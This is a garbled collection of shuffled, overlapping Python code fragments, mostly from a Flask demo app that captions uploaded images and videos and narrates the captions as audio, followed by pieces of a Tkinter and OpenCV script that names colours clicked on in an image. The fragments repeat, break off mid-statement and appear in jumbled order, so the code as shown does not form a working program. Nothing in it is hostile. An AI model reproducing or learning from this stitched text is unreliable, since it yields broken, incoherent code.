"\"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\"",
"'video' in x] # Randomly select ids from their respective datasets and reject",
"'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load",
"nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load",
"+ '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe",
"cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and",
"samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos",
"filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to demo_output",
"[[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []] for i, ix",
"render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html',",
"beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] +",
"'.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given",
"samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF",
"for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render",
"'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] =",
"has an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in",
"> best_score: best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption",
"rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids",
"vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' +",
"filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename +",
"contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\"",
"def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if",
"cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts",
"caption, scene_example_file + '.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file",
"page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images',",
"== 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x not",
"filename, save to file, get ext and determine type file.filename = file.filename.replace(' ',",
"vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes',",
"= 'by_scene' in request.form # Check if filetype is allowed if file and",
"not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption(",
"in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file",
"\"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about",
"= ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge im",
"str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'],",
"bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt =",
"Create scene example if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'):",
"Check if file is uploaded if request.method == 'POST': try: # Grab file,",
"video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption =",
"narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = '' best_score = 0.0",
"scene and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'],",
"import shutil import pandas as pd import skimage.io as io import PIL from",
"+ '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg')",
"samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images",
"# Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize",
"*filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace existing",
"scene example if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): #",
"store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image",
"caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET',",
"[], [], []] VID_SAMPLES_DICT = [[], [], [], []] for i, ix in",
"example if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate",
"name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption']",
"render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html',",
"Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF",
"= narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt",
"in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({",
"filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE'])",
"Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') #",
"classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] )",
"# Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4'",
"}) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt':",
"Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption",
"samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name,",
"return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html',"
] |
[
"test_find_collection(): location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location =",
"None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules():",
"location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not",
"is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules is not None",
"( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location",
"import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert",
"def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules",
"test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location =",
"= find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert",
"assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is",
"find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is",
"assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is",
"location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not",
"ansible_events.collection import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\")",
"not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def",
"test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules =",
"find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules",
"find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location",
"is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None",
"= find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert",
") def test_find_collection(): location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda():",
"not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def",
"None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source():",
"def test_find_collection(): location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location",
"is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None",
"assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules is",
"split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is not",
"location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\"))",
"location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\")",
"location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules is not",
"location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\"))",
"<gh_stars>0 from ansible_events.collection import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location",
"def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location",
"load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is not None def",
"= find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert",
"from ansible_events.collection import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location =",
"find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is not None",
"find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location"
] |
[] |
[
"= openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\":",
"from tkinter import * import cv2 import numpy as np import urllib.request import",
"file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn",
"= ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open",
"urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg =",
"== cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos =",
"Detection\",img) if (clicked): #scale text according to image size imageWidth = img.shape[0] imageHeight",
"cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale",
"(max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name and RGB",
"urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image",
"imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1)",
"= False r = g = b = hexcode = xpos = ypos",
"minimum = 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G-",
"btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) #",
"giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function",
"btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3",
"urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp",
"to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate",
"import urllib.request import pandas as pd from tkinter import filedialog from PIL import",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label =",
"image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType )",
"getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click def",
"#resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop()",
"= min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display",
"text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in black colour if(r+g+b>=600):",
"img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn",
"names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to",
"btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2",
"text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key if cv2.waitKey(20) &",
"PIL import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color Detection\")",
"endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn",
"fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display(",
") cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in black",
"size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img,",
"#Reading the image with opencv img = cv2.imread(image_path) #declaring global variables (are used",
"urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260)",
"cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name and",
"int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked):",
"urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image =",
"import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\")",
"cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image size imageWidth =",
"image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint,",
"open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png",
"and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None)",
"csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all",
"= csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn",
"btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4",
"if image_path == \"\": img = urlimg.image else : #Reading the image with",
"image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 =",
"colors and get the most matching color def getColorName(R,G,B): minimum = 10000 for",
"int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"]",
"draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos",
"strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else :",
"Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image",
"#copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth",
"index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from",
"Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text",
"selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized)",
"resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start",
"# open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3",
"cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize",
"urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS)",
"rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name",
"+\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to",
"finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg",
"ypos = y b,g,r = img[y,x] b = int(b) g = int(g) r",
"loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF ==13: break cv2.destroyAllWindows()",
"on) clicked = False r = g = b = hexcode = xpos",
"root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array",
"btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1",
"while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image size imageWidth",
"entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color",
"imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire",
"img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills",
"finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen",
"Color Detection\",img) if (clicked): #scale text according to image size imageWidth = img.shape[0]",
"pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53')",
"mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked",
"open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized =",
"openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1)",
"d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of",
"global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\")))",
"text = getColorName.cname + ' R='+ str(r) + ' G='+ str(g) + '",
"= d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates",
"selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn =",
"root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select",
"selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image",
"Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename =",
"command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image",
"to display( Color name and RGB values ) text = getColorName.cname + '",
"from tkinter import filedialog from PIL import ImageTk,Image import pyperclip as pc root",
"image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg =",
"btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg",
"= y b,g,r = img[y,x] b = int(b) g = int(g) r =",
"cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key if cv2.waitKey(20)",
"def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"]))",
"= getColorName.cname + ' R='+ str(r) + ' G='+ str(g) + ' B='+",
"pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command =",
"will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop",
"abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname =",
"image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path",
"selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2)",
"if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key if",
"= 0 #Reading csv file with pandas and giving names to each column",
"getColorName(r,g,b) #Creating text string to display( Color name and RGB values ) text",
"= csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click def draw_function(event,",
"btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry",
"= cv2.imread(image_path) #declaring global variables (are used later on) clicked = False r",
") text = getColorName.cname + ' R='+ str(r) + ' G='+ str(g) +",
"color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string",
"global variables (are used later on) clicked = False r = g =",
"def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image",
"select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS)",
"used later on) clicked = False r = g = b = hexcode",
